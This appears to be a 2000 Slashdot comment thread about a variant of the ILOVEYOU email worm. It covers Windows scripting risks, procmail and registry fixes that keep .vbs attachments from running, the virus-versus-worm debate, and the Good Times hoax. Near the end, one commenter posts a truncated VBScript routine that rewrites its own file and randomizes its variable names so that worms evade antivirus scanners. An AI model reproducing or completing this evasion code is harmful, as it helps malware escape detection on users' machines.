Releasing a virus into the wild or dropping a nuclear bomb is an entirely different story. It's not the technology itself that's evil, but rather the application thereof.
Solution to blink tags: wrap them in another blink tag, with a javascript delay loop, so they cancel each other out
Then we could have free love. As well as a real GPL virus.
Damnit where are my moderator points when I need it, this thing should be +5 Insightful. ;]
It seems the only way administrators can TRULY be safe here, is to NOT ALLOW attachments on emails.
:)
:)
I work for a Checkpoint Firewall-1 reseller, and it is becoming apparent that our customers want their firewalls to strip out ALL scripts attached to emails (via CVP servers). This is a good first step, but why not just drop ALL attachments? Thats what i would do. Users of an organization should have an ftp site to transfer files outside of the organization... That way complete control of what comes in and out is easy....
But, naturally, this wont happen, because users want to be able to send Word documents and jokes (i.e. jpgs and swf files) to each other...
I cant wait to see how many people click on THESE vbs scripts! Its just a matter of time before someone writes one that screws with the CMOS/BIOS and the MBR of the hard drive... funfunfun
Cybie! aka Ralph Bonnell
The latest nav for NT thinks that
D:\Perl\html\Perl-Win32\perlwin32faq12.html
from 6/24/99
is
"VBS.NewLove.A DRESSENT"
call me skeptical.
all your base may never have existed at all
C|Net and ZDNet are reporting that the new variant not only chooses random subject lines for its email carriers, but also adds comments to its own script, in an attempt to thwart fingerprinting.
My question: who actually needs email-attached scripts to have write access to the registry and filesystem? And who thought there were enough of these people to allow such access by default?
This virus may finally push a significant people over the edge to not running Windows (or at least no longer believing the "party line" from Redmond).
Why this virus? Because there is no effective cure yet. The "patch" issued earlier this week by MS is a joke both superficially (filter attachments by name) and fundamentally (see ntbugtraq). So we are now in a state where ANYONE who can program VBS (and who can't?) can create self-propagating nightmare for network admins and there's no fix in the foreseeable future.
MS can't fix this problem from their end. It has to be solved by individual admins. And as soon as admins are allowed/forced to think for themselves without any input from The Beast, a significant number of them are going to wake up and realize the real solution: Ditch Windows.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I posted this filter up on freshmeat as well, but now that there is a more destructive version of this floating about, it should be distributed more. All you admins who are using procmail can add these two rules to your global procmailrc to prevent the execution of .vbs attachments to email messages. The email isn't deleted, just that the files extention is changed so that it will not execute on the end users system.
:0 Bf2 /i;}' -e '/Content-Type:/{N; s/name=\(.*\)\.vbs\(.*\)/name=\1.vbs.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: viruscheck"
:0:
*!^X-Loop: viruscheck
*^Content-Disposition:[> ]+.*[Aa]ttachment.*\.[Vv][Bb][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.vbs\(.*\)/filename=\1.vbs.txt\
$ORGMAIL
If you have any questions, please feel free to contact me about it.
I work for a NASA contractor. The Government head of our area got a copy of ILOVEYOU from one of our University partners. As we do satellite image processing, it was just conceivable that they might have legitimately sent us a pretty-picture executable, so he tried it.
He was on a Mac, so the program failed; he then forwarded it to another guy running Windows. He got clobbered when he ran it, and I got my copy from him. I read mail on a Unix box with Netscape (and I know better than to ever run an executable attachment), so I was safe.
This shows why e-mail is such an effective way to spread this stuff. The virus was passed from user to user without being executed, through machines where it couldn't execute, and was still dangerous when it arrived.
To a Lisp hacker, XML is S-expressions in drag.
2 more questions... How much does it cost (I'm just curious... if it's actually useful, i have no problem paying for it), and can it syncronize with my Palm?
I do believe I've found a version of Eudora that was integrated with PGP, though... That was really cool... if you had a key for a given recipient it would automatically encrypt the message for that person. Much better than outlooks insistance on using only certificates that come from a "trusted" source and therefore cost $$$.
Of course the Mac version of Outlook doesn't seem to want to support any signing/encryption schemes, so it's a moot point.
Eudora Pro, you said? Maybe i'll go check it out....
.. everything looks like a nail.
It's a good filter and all, but what if somoene actually wants to receive vb, js, com, bat, exe and God only knows what else?
This filter will protect the ignorant from themselves, but then again, so does Microsoft's 'solution' to the problem.
-- What you do today will cost you a day of your life.
Wouldn't it be sad if this virus got forwarded to some spam-list 'maintainer' who is dopey enough to keep all of his 'contacts' in MS Outlook? Come to think of it... about 80% of the mail I get is spam. I wonder why I haven't gotten one of these virii yet...
http://crummysocks.com
Go Here: http://www.dcaff.com/virus/
run Disable_VBScript.reg
if you have problems (like excel macros, run Enable_VBScript.reg)
have a nice day. =)
-andy
If a script has access to the same resources as a compiled program, both are capable of equal damage. VB script can access Windows' API which includes file i/o and the Windows registry. Perl isn't much different, it even has been used to create a hard-drive partitioning tool.
Java on the other hand does not have access to the operating system. It was designed for the sole purpose of downloading applications and scripts without ever worring about the security of the computer or operating system. That is why Sun was so choked at Micros~1 for added such features as API access to their virtual machine.
I predict in a few years, every program will be interpreted, BECAUSE of security. Why? Interpreters if designed properly are far more secure than compiled programs (ie Java, Html). Its when interpreters (VB Script) get into the wrong hands, that is when they sink to the same level as compiled programs.
Ozwald
I think paragraph three would be even more to the point if you added the following two sentences...
(addition in italics)
Unfortunatly, they also come up with the bright idea of executing email. This isn't a new idea, its occured to a lot of other people. They all just had more sense than to include such an obvious security hole, in mass distribution software. Now MIME attachments aren't enough
Organizer:New England Rubbish Deconstruction Society;The NERDS,first US team in the UK Scrapheap Challenge/Junkyard Wars
MSK
what Karma whoring this post is!
All I was trying to do was bring laughter to the world *snif* *sob*
Finkployd
It is recommended that you remove this program imediately.
I woke up this morning to my radio. (Which is unusual. It usually takes my alarm going off at full volume for about 10 minutes. The alarm goes off after 10 minutes of full-volume radio.) I heard the announcer state that there was a new strand of the ILOVEYOU virus released, much more deadly. I just rolled over and went to sleep. I pitty the fool who subjects himself to such things.
What type of real-life virus might computer viruses be comparable to? STD's? You 'sleep around' without protection, you'll get em. What might that make Microsoft products, then? :)
-------
CAIMLAS
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
No...I am 30. And my sister is technophobic..so no...our secretary is NOT my sister.
If you're not a Liberal in your 20's, then you have no heart.If you're still a Liberal in your 30's you have no brain.
>>Viruses are challenging and interesting.
>Yeah, like biological ones. But we don't go
>around spreading them happily, do we?
Happily enough; look at STD's.
>> Some of the ideas used in them have been
>> incorporated into modern software.
> Like? I can only think of BSOD as an example
> of payload.
I've seen a production system that has a component which delivers itself to hosts around the network as a virus. It has brakes, but it's a virus. It does real work in the real world.
-fb Everything not expressly forbidden is now mandatory.
1. Getting people to run the darn thing after all this. Of course you could just wait a month for everybody to forget about it.
2. For it to do anygood it would have to be as prolific as ILOVEYOU was.
3. It would still cause headaches for administrators as their mail servers get over-loaded and shut them down, causing major disruptions.
4. It's still a virus so you would still be liable under the "Computer Abuse and Fraud Act". I don't think many people are that crazy.
5. Disabling scripting probably breaks other's applications and cause disruptions or damage.
On the upside though...
1. It would be self limiting, since if it was done correctly it would not be able to re-infect a PC.
2. You may be able to clain that what disruption and damamage you caused prevents others causing serious disruptions and damage, and get a reduced sentence (not likely).
3. Get the adoration of other geeks by fixing a problem Micro$oft has not been able to fix. (I hope you really don't belive that)
So what geek out there is crazy enough to pull off a stunt like this, it's feasable, but I would not want to get caught!
subsolar
Really? You mean all those STD-10 (RFC-821) compliant mail servers are exactly identical? So we may as well all use <insert your favourite mail server here>? :-)
But seriously, you've got this backwards. Standards compliance permits diversity, by providing a common ground for diverse elements to interact over. It doesn't matter if your mail server is written in C, Perl, INTERCAL, or PostScript, it doesn't matter if the processing work is being done by a Pentium, an Athlon, a G4, or a Benedictine monastic order, as long as you speak SMTP, welcome to the club. And, with dozens of different servers out there, it's doubtful you can take all of them down with one exploit.
Speaking of which, anyone know of any buffer overflows you can use against a Benedictine monastic order? :-)
The fact that in this case, one of the branches of that big MUA tree has... questionable ideas about acceptable behaviour... is supposed to be dealt with by a little thing called ``survival of the fittest''. In theory. In practice, it seems you can suck rocks, as long as you breed like wildfire. :-(
@>-`--,--
I do have a cause. It's obscenity. I'm for it.
--Tom Lehrer
Teach your kids: "C++ made baby Jesus cry."
DO NOT LEAVE IT IS NOT REAL
Anyone that thinks Linux is immune from virii is a moron. These are just simple attachments that dumb people run on their machine. People can run attachments on any OS, folks. It's the USERS that are stupid, not the client or the OS.
I eat the flesh off the living, and I vote!
Sure, go ahead
:)
I'm flattered someone would actually want to reproduce one of my caffene induced posts
Finkployd
I ctually like Outlook Express more than any other mail reader... Compared to say netscape messenger, Outlook can: Recieve mail from multiple POP boxes without needing to change identities, let you decide which account you'd like to send each mail from from the message composition window, has a much better rule system for filing messages, and it just plain looks nicer than any of the other apps i've used.
Too bad, though, that all these macro virus' don't seem to want to infect Mac's.... I get to use good software without all the worries that go along with MSFT.... As a matter of fact, it seems that all of Microsoft's apps for the Mac are much better built than the same exact ones for Windows. How can Microsoft explain that, while also explaining that being broken up would destroy their "synergy", etc...?
One always wonders if there's some connection between the anti-virus companies and the virus writers.
There is an alternate path though, and that is when the virus is non-destructive (dormant) for a long period, and then flares up to become extremely destructive. AIDS, for instance. Many computer viruses have followed this path as well, with a built-in "time-bomb" date.
Personally, I think the most interesting virus would be totally non-destructive, and would not bother the infectee by consuming resources. (i.e. your example of monitoring CPU and network) Some people have predicted that the first true AI will be an entity that grows out of the network. I think this is exactly the way to do it. Someone suggested a small daemon that communicates with itself. I have seen code that changes its name every second, to prevent killing, and obscure it in 'ps' output. Monitoring load and network bandwidth is pretty easy, even for a program that isn't running as root. I wonder if someone will eventually write this...
--Bob
1^2=1; (-1)^2=1; 1^2=(-1)^2; 1=-1; 1=0.
can anyone post it? I am interested in what this one does.
-If at first you don't succeed, call it version 1.0.
When he was in college, Bill Gates worked as a waiter. One day, a customer calls him : "Hey,Bill, there is a fly in my soup." Bill comes over, looks at the soup, examines it, and walked away. "Aren't you going to do anything?" the customer asks. "Oh, don't worry about the fly, it isn't a bug, it's a feature."
Hopefully I didn't put any [] around my words.
You are ignorant if you think that these e-mail viruses will only use VBA/Outlook Express as a distribution mechanism. They could just as easily be distributed as an .exe file that searches the hard disk for the text file that contains the Netscape Inbox messages. It could then extract all e-mail addresses (not just "Contacts") and intelligently concoct a reply based on the content of the message it found the address in. While they are likely to only effect the Windows platform, it would be just as easy to write a Linux version.
I think that we have only seen the tip of the iceberg as far as intelligent viruses are concerned. It would be very easy to target a particular organization by only deleting users' files if the user identifies himself within a particular domain (i.e. aol.com) and otherwise just replicating. People need to learn not to open e-mail attachments that they do not expect to receive.
ByteMyCode.com: A Web 2.0 code sharing community.
I remeber the Good Times virus. That was the hoax that was always mentioned. Now with all the security problems, that can actually be done. Say, why hasn't someone created an email that completely follows the Good Times virus, including the subject?
I am a bad speler. Please ignore speling meestakes in me poast.
-coyo
--------------------------------------------------
This is my sig. There are many like it, but this one is mine.
--------------------------------------------------
I'm not a virus writer, but if there are any out there, wouldn't similar functionality be possible through the use of Outlook/Macintosh and an AppleScript attachment?
.VBS attachements, because the subject of the new variant changes dynamically. Since ".VBS" is how DOS signifies file types, and since Macintosh uses a less visible means of specifying file types, I began to think of ways, architecturally, this would work on a Mac. It seems like AppleScript would foot the bill. Most machines have it installed by default, it's executable content, a file, and isn't Outlook scriptable? I'm wondering if AppleScript could get Outlook to do the same sorts of things. . .
I just read a news report about the new virus, and the warning they're giving about it is for people to avoid messages with
I just remembered this old Metallica song. . .
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
Grin... I remember getting that one. It's pretty old, originally being a parody of the "Good Times" virus hoax. Ironically, the Good Times virus was purported to be a virus that you could get just by reading an infected e-mail, which would have the subject line "Good Times." It would do horrible things to your computer and send it out to all of your friends. At the time, people who were "in the know" laughed off the idea that a virus could actually do that, and the "Bad Times" joke was based on that idea.
And now, it turns out that Good Times was real after all, they just got the name wrong and called it early...
I'm installing a subspace harmonics dampener as we speak. Don't want to take any chances.
-jacob
Hmmm, then the vaccine wouldnt make it very far.
Later...
KangarooBox - We make IT simple!
A note about posting as extrans: it seems that that and the "plain text" posting options have been switched since posting as plain text will activate any HTML in your comments.
Ideology is for ideots.
Pine was cool in the 80s, but it just doesn't cut it anymore for me.
I eat the flesh off the living, and I vote!
You've never heard of FortRes?? We use it on some of our WinBloze boxen, and, while it doesn't stop users from trying to install stuff, they get screwed when they try to reboot, because they don't know the box pword OR the FortRes pword. Ha! Plus of course we use (constantly updated) McAfee antiviral software AND we don't run any M$ email programs (on the public boxen).
We run 50 win boxen (half and half public / staff) and the only place I saw the virus was on /. when someone posted the code. (My staff is educated enough not to open unsolicited attachments, even though some of them use Outlook. I took the time to explain the whole thing very carefully at a staff meeting after the Melissa fiasco.) So education *does* work, but only for motivated users.
I certainly agree with your last point: you can't ignore user ignorance.
DNA is a Turing machine. You, however, being dynamic and emergent, are not.
(Disclaimer. I'm a consultant onsite at a Fortune 100 company.)
:-)
/the/ tool.
First, it's not my choice.
Second, none of the really powerful CAD packages run on Linux. Most of the workers here are ME's and EE's. I'm talking about CAD drawings that'll take a multiprocessor HPUX box with 4G of RAM to its knees.
Third, there's management fear. Fear of the unknown.
Fourth, the whole accounting group has unbeleiveably complex macros written in 123 and Excel. The cost of transitioning 50,000 people to free software (converting macros, user training) is magnitudes above the expense of paying MS or Lotus an annual fee.
Fifth, there is an expense in transitioning from one system to another. It's not just about the price of the software.
Sixth, the whole help/support staff would have to be retrained. Since there aren't flashy certifications in free software (or dern few of them), most people wouldn't think it's a worthy goal. Most employers, if you say, "I _wrote_ product X" wouldn't care. If you said, "I'm certified in Product X," you'd probably get the job.
Seventh, free software is a pretty nice solution, but it's another tool in the toolbox, not
Eighth, did I already mention that it's not my choice? There is a groundswell toward linux building here, but it'll likely take the attrition of the older employees before it becomes the standard.
In the wake of the original iteration of the Love Bug, President Clinton finally uttered those delightful words "national security." The logical extension of this (at least as logical as anything from within the DC Beltway is ever likely to get) would be that the Congresscritters pass a bill declaring virus writers and crackers as terrorists.
Then our various flavors of quick-response folks who make a fashion statement out of black Kevlar could do their thing. Best of all, Judge Jackson could finger Windows as a great big virus and next thing you know, there go Gates and Ballmer in cuffs.
"How many light bulbs does it take to change a person?" --BMcC-->
Virus Experts are predicting that the spread of this variant will be slower than the original Lovebug virus, because of the 'mutation' that it tries to perform on itself. Every time it mutates, it adds up to 10 lines of crap to itself, in order to try to avoid detection. It ends up being huge after a moderate number of iterations.
Have a look at Symantec's information.
~P
That was witty...
Sounds like a lyric a bad highschool band would come up with.
Blar.
It's a complex balance between good and evil that must exist. If writers stopped creating virii, there would be no need for protection. Users would go on their blissful way until one person takes advantage of the peacefulness to collapse the system.
Most times, it's just something that would be great to watch, seeing a creation of your own cause mass destruction. Or even, knowing that it is able to cause desctruction, then seeing a naive person steal the code from your machine and send it out.
The first ILOVEYOU hit our company hard. We took the Exchange down, updated all the mail servers, and the network-wide virus scanning for all the users' computers. However, the problem was that idiot users were mapped to production web boxes, and caused the virus to spread to machines that we didn't think would ever have to be checked. It's because of this infection that now we spent hours installing AV clients on 120+ production servers.
As a whole, ILOVEYOU wasn't too drastic. It deleted some web images that we just had to restore. But it was because we got hit that we're now prepared to defend against virii like this new ILOVEYOU, which does drastic damage.
I want to be able to execute attachments I receive easily. I want these attachments to be able to do what I can do. What I don't want is for these attachments to be able to do stuff without my explicit permission to do so.
I don't like the idea of sandboxed execution or chmoding the user permissions because they make it a pain-in-the-ass to actually do stuff that I want them to be able to do.
\begin{daydream>
What I'd like to see is to see sandboxed execution or editing (instead of executing) being the default and it should be simple as a right-click "Execute" to allow an attachment to actually execute and do stuff. I'd also like to be able to easily tell it when I want to just view the thing and when I actually want to execute.
\end{daydream}
PS: Damnit, I'm trying to post using Plain Old Text. Why won't Slashdot let me use XML tags for my "daydream"??
Mmmm.. Donuts
Well, too bad! Because we're back there again, and nobody is ever going to be able to send an attachment without first calling the recipient.
So call your old university and get your VAX account back. It's the the tightest send in the file sending business.
-Omar
[HKEY_CLASSES_ROOT\vbsfile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\vbsfile\Shell\Open2] @="Open &with Command Prompt" [HKEY_CLASSES_ROOT\vbsfile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
Doing so will disallow the default open and run behavior. This will not keep you from running the scripts, if you really want to. You just have to be explicit about it now, ie 'cscript blah.vbs'
Beware though that there are also other macro language files to watch out for ( and I am suprised no viruses written in them have surfaced yet! )
For Example:
[HKEY_CLASSES_ROOT\WSFFile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\WSFFile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\WSHFile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\WSHFile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\JSEFile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\JSEFile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\jsfile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\jsfile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\PerlScriptFile\Shell\Open\Comma nd] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\PerlScriptFile\Shell\Open2\Comm and] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command] @="C:\\WINNT\\System32\\WScript.exe \"%1\" %*" [HKEY_CLASSES_ROOT\VBEFile\Shell\Open2\Command] @="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
etc, etc.. A search for CScript in your registry will find all the interesting items.
You made some excellent points.
I'd like to add, however, that most computers are single-user devices now and there aren't typically "other users files" on your computer. I also read somewhere that with Win2K it's not possible to overwrite system files. (although I suppose a virus could just as easily destroy non-system applications).
Mmmm.. Donuts
If I may quote my favorite CEO: "Pursuing the biological simile, observers pointed out another problem caused by Microsoft's monopoly: the lack of genetic diversity in the PC ecosystem. Because PCs and their software are too similar, one noxious automaton can do much more damage than would occur if we had several alternative life forms.
This argument deserves closer examination. True, BeOS, MacOS, and Linux users were not infected by the Love virus. Had each system had 25% market share, a single virus could only infect 25% of the population."
The ILOVEYOU virus is kindergarden stuff compared to what a real programmer could really do if he/she put their mind to it, but since experienced programmers are (most of the time) fairly matured individuals, but it would only take one fairly good hacker to release a plague on the world...
>Q. Is Linux and UNIX impervious to viruses?
>A: Three words: Robert Morris' worm.
My memory is a little hazy on this, but wasn't Robert Morris' worm released around 1988 or so? If it was Linux wouldn't have been affected by it any more than it's being affected by the current crop of Mircosoft viruses.....
You are forgetting one major factor: Choice.
...so I can add to the performance.
I may choose to read or ignore a book about murder. I happen to like that genre actually, nearly as much as I like film noir. But still, the difference is that I *choose* to read that subject.
On the other hand a virus is basically a hit and run _crime_. As one of the other respondents above remarked, modern art, by my standards would not be considered art. I disagree because I can ignore it. I may not call it art, but someone else may. I cannot ignore a virus, even if I am running a nearly immune system.
To compound the issue, not only do viruses steal your ability ignore them, the nastier ones tend to cost money. Either the viruses destroy work product or they create work for the admin who then has to fix his network.
If you want to call it art, fine, as long as the creator makes it performance art. Like boxing
In the immortal words of Socrates, who said; 'I drank what?'
"I'm suprised no one has even thought of not associating .vbs files as executables with explorer, have notepad open them instead. "
.reg file to do this, and emailed it to all of the users here (as well as another organization that got hit the last time).. it worked pretty well.
People have thought of it..
In fact, I created a simple
I'm getting a little bored now hearing about the same bugs in 200 different forms. All those virus idiots should take off for the summer and let everyone that fell for the first one recoop. If the "Virus Community" really wants to do something good ("bad"...whatever!!) come up with the best virus protection ever...not only will you get more recognition than a virus would but you would make a buttload of money....stir it around....buenos nachos!!
No, it's a trojan horse. It's a piece of malicious code delivered in a way to use deception to trick someone into executing the program.
I've seen a production system that has a component which delivers itself to hosts around the network as a virus. It has brakes, but it's a virus. It does real work in the real world.
A worm...
I hope they get their security right so that only the good program is allowed to replicate by the carrier machines.
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
You mean it was a worm written by a cracker, not a virus written by a hacker?
Anyhow, I never really cared much for language purism. Language evolves. That's not to say that these distinctions aren't important within certain technological circles. If I were writing a technical article for some journal on computer security, I would want to get it right. But for the mainstream, "virus written by a hacker" is plainly the accepted terminology.
Another way to look at this is that "virus" is being used as a general term for all potentially destructive computer programs, and that "trojan", "worm" and "hostile applet" are just subclasses of "virus".
Now you /. people can sit there and gripe all day about what people ought to say, but you're not going to win.
Wouldn't it be more interesting to simply look at these things as linguistic trends rather than errors?
In a sense, English and other languages are the first collaborative Open Source project ever. Yet so many /.ers fail to realize that, and refuse to participate, because they are hung up on language purism.
For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
From the Good Times virus hoax FAQ, the original message announcing the Good Times virus read:
Thought you might like to know...
Apparently , a new computer virus has been engineered by a user of America Online that is
unparalleled in its destructive capability. Other, more well-known viruses such as Stoned,
Airwolf, and Michaelangelo pale in comparison to the prospects of this newest creation by a
warped mentality.
What makes this virus so terrifying is the fact that no program needs to be exchanged for a new
computer to be infected. It can be spread through the existing e-mail systems of the InterNet.
Luckily, there is one sure means of detecting what is now known as the "Good Times" virus. It
always travels to new computers the same way - in a text e-mail message with the subject line
reading simply "Good Times". Avoiding infection is easy once the file has been received - not
reading it. The act of loading the file into the mail server's ASCII buffer causes the "Good
Times" mainline program to initialize and execute.
The program is highly intelligent - it will send copies of itself to everyone whose e-mail
address is contained in a received-mail file or a sent-mail file, if it can find one. It will
then proceed to trash the computer it is running on.
The bottom line here is - if you receive a file with the subject line "Good TImes", delete it
immediately! Do not read it! Rest assured that whoever's name was on the "From:" line was
surely struck by the virus. Warn your friends and local system users of this newest threat to
the InterNet! It could save them a lot of time and money.
The Good Times virus described by that message never existed. You can claim that the message itself is a virus, but then it wouldn't be the Good Times virus, it would be the "meta-Good Times virus." (And if I get you to repeat this description to your friends, you could call that the "meta-meta-Good-Times virus," and then they could spread the "meta-meta-meta-Good-Times virus" and so on... GEB, here we come! =])
-jacob
I used to think that way about virus/worm and hacker/cracker. But..english terms change meaning weather you like it or not. This faq was written over 5 years ago. Since then the scope of people using these terms changed significantly. The public can't remember hundreds of jargon word so hacker and cracker become one "cracker"- and virus and worm become "virus". "Virus software" has to protect against what we knew as worms and well as viruses. You don't market "Norton anti-worm/virus" software or people are going to think it's a medicinal product. 99% of people have never heard the term worm, yet most know that a virus is something bad you can get. To make matters worse, the distinction on how it propagates is only understandable by technical people. There is no logically reason for most people to call one thing a virus and other thing a worm.
I think this is partially a case of technical people feeling they are elite and need to correct people who could care less, much like an English teacher who corrects your speech that no one else sees a problem with. You have to speak the language of the people when you report in the media. It's not that the reporters don't know what a worm is (though I'm sure many don't), it's that you (and your other 1%) are not their target audience.
-- Virtual Windows Project
companies that make virus scanners write at least some of the viruses in order to stay in business.
Is that too crazy to be true? I don't think so.
--
Moderate this up!
Though obviously MS is the prime culprit here, that goes without saying.
Female Prison Rape in NY
One could assume that the virus would FIRST duplicate itself, and THEN fix the register. :o)
Phobos - Greek word for fear or flight
Here.
I'm really sick of people focusing on VBScript as some kind of token of Microsoft Evil(tm). The thing about this Trojan is it could have been done on any system, VBScript or not. Lets look at what is does.
1. Get's sent as an attachment:
2. User executes an attachment (big mistake).
3. Attachment does bad stuff.
Basically it's program that does bad stuff. Well shit, any program could do some pretty nasty things if it wanted to. You could write a little sh or perl script to mail all your friends with some little attachment, then wipe anything with a+rw perms, and hell a lot of the newer linux user's might even run it.
This program has got so well propagated due to the generally low computer literacy of Windows users. All my friends (who are geeks), we're not so foolish as to run this attachment, nor did they run programs like "fun.com", from some kids "3l33e3e" web site. It's just the law of the land.
-Jon
this is my sig.
Damn, I got hit with a variant of this!
- YOU HAVE NOW RECEIVED THE UNIX VIRUS -
This virus works on the honor system:
If you're running a variant of unix or linux, please forward
this message to everyone you know and delete a bunch of your
files at random
And just after I got done restoring my files from backup, I was hit again by a different variant!!!
Will the horror never end?
:0)
Steven Rostedt
Steven Rostedt
-- Nevermind
*WARNING* The following contains instructions which may cause great harm to your computer if done incorrectly. Use this technique at your own risk. *WARNING*
Here's how to cut Melissa & her children off at the knees:
Close MS (swear)Word and Excel.
Open an Explorer window, navigate to C:\Program Files\Common Files\Microsoft Shared\VBA
Create a folder called "Pit of Hell"
Move all files that start with "Vba" into the "Pit of Hell" folder. If Windows whines that a file is in use you may have to reboot to do this step.
This prevents VBA from working at all. Word and Excel continue to work, you just may see a message saying 'Unable to initialize Visual Basic environment'. This is a good thing. Occasionally a document completely refuses to open but I just send it back to the originator and ask them to "save it in RTF format, please". If you absolutely need to open a document with VB scripts just move VBA out of the Pit of Hell back where it came from (temporarily of course).
--
My other computer is your IIS server.
A while back some rather paranoid chaotic individual who shall remain nameless suggested that perhaps the guys who make their living with the virus scanners and virus cleaning software are behind a good portion of the most destructive virusses out there. That theory is patently silly, of course. Isn't it?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
The idea of a paperclip wagging its finger at me, left me speechless the first time I saw it...
Wasn't there a notice recently that someone found a scripting hole with said paperclip?
`It looks like you're trying to 0wn this box; would you like me to help?'
Matthew @ Bytemark Hosting
in case anybody is interested... at http://noxxi.net/misc/mf.pl is a small script which simply renames all dangerous attachment names (which is everything except a view) so that they don't get executed on click. use it in the company I work for (mail gets loaded by fetchmail, piped thru this script and than forwarded to the recipient)
Yah, *we* might know this, but your average win9x user doesn't. They kinda understand a virus, to the extent that they know it's bad, but let's not give them too much credit for intelligence. Worms, trojans, virus, etc. Just call it a virus & don't confuse them.
jred
I'm not a mechanic but I play one in my garage...
And they don't have you in their address books fuckhead.
I know this isn't all that great of code, especially since it doesn't actually reprogram itself (like any good polymorphic script should do) but this makes most VBS virii/worms be undetectable to standard virii scanners. My question is 'Why don't virii scanning companies just make smarter scanners?'
, 1)
b les,moose,newvarname"
, true)
-------------
dim debug
sub debuglog(text)
debug=debug & vbcrlf & "dbug-" & text
end sub
'----------------- remove the above function, its crap....
dim fso,jogger,ViriiFile ' jogger is the string containing this file
set fso=CreateObject("Scripting.FileSystemObject")
'set Viriifile=fso.OpenTextFile(Wscript.ScriptFullname
set Viriifile=fso.OpenTextFile("C:\tmp.txt", 1)
jogger=Viriifile.ReadAll
viriiFile.close
function crypt(text, offset)
if offset =255 then
char=char-255
elseif char1 and not asc(mid(file(i),j-1,1)) = 60 and not asc(mid(file(i),j-1,1)) = 62) then
for k=1 to int(rnd*3)+1
replaceline=replaceline & chr(32)
next
replaceline=replaceline & chr(61) ' add = in...
for k=1 to int(rnd*3)+1
replaceline=replaceline & chr(32)
next
end if
case else
replaceline=replaceline & mid(file(i),j,1)
end select
next
' wscript.echo "We are replacing line: " & vbcrlf & file(i) & vbcrlf & "With:" & vbcrlf & replaceline
file(i)=replaceline
if (rnd*10)+1=1 then file(i)=file(i) & vbcrlf
next
dim FileToChange
filetochange=wscript.scriptfullname
set viriifile=fso.CreateTextFile(FileToChange,true)
viriifile.write join(file,vbcrlf)
viriifile.close
end function
main()
sub main()
'add these lines to the original 'virus' or worm
polychange()
ReplaceVariables()
if len(debug) >0 then wscript.echo debug
end sub
'-------------------- below is the variable variables stuff.
Sub ReplaceVariables()
dim fso,moose,MiaFile ' hehe very descriptive names.... heh 'moose' and 'MiaFile' I think I was on crack when i wrote this stuff
set fso=CreateObject("Scripting.FileSystemObject")
set MiaFile=fso.OpenTextFile(Wscript.ScriptFullname, 1)
moose=MiaFile.ReadAll
MiaFile.close
dim VariablesList,alist,newvarname
variableslist="MiaFile,variableslist,ReplaceVaria
'------------ THE ABOVE LIST MUST CONTAIN ALL VARIABLE NAMES AND ALL FUNCTION NAMES (keep them unique and not occuring naturally anywhere else (that means change all my for(i) loops to for (fruityi) or something... make them unique!
alist=split(variableslist,chr(44))
for i=0 to ubound(alist)
newvarname=RandomVarName()
moose=replace(moose,alist(i),newvarname,1,-1,1) ' we dont want a binary compare...
Next
set MiaFile=fso.CreateTextFile(wscript.scriptfullname
dim odd,newmoose
for i=1 to len(moose)
if int((rnd*3)+1)=1 then
newmoose=newmoose & ucase(mid(moose,i,1))
else
newmoose=newmoose & lcase(mid(moose,i,1))
end if
next
MiaFile.write newmoose
MiaFile.close
End Sub
function RandomVarName()
randomize
dim length,char
length=int(rnd*20)+20
for i=1 to length
char=chr(int(rnd*26)+97)
' if int(rnd*2)=1 then char=ucase(char) ' I decided this wasnt needed
randomvarname=randomvarname & char
next
End Function
Ever need an online dictionary?
Anti-viruses are benign viruses, but all viruses are evil.
Myself, I don't want anything propagating through a clandestine channel onto my machine, thankyou very much. I certainly don't want some do-gooder code messing with my machine behind my back. Most of my friends feel the same way. I would very much not want to be responsible for transmiting such a virus to their machines.
Back in the good old days when software moved via 5.25in disks, did you ever propagate a virus, (even a benign one) to a bunch of friends? I remember what that felt like. "Did you get a disk from XYZ? Yeah? I got one; had a lot of viruses on it. I think you should check you machine." It's like having some horrible social disease.
Executive summary:
Once more unto the breach, dear friends, once more, Or close the wall up with our American dead!
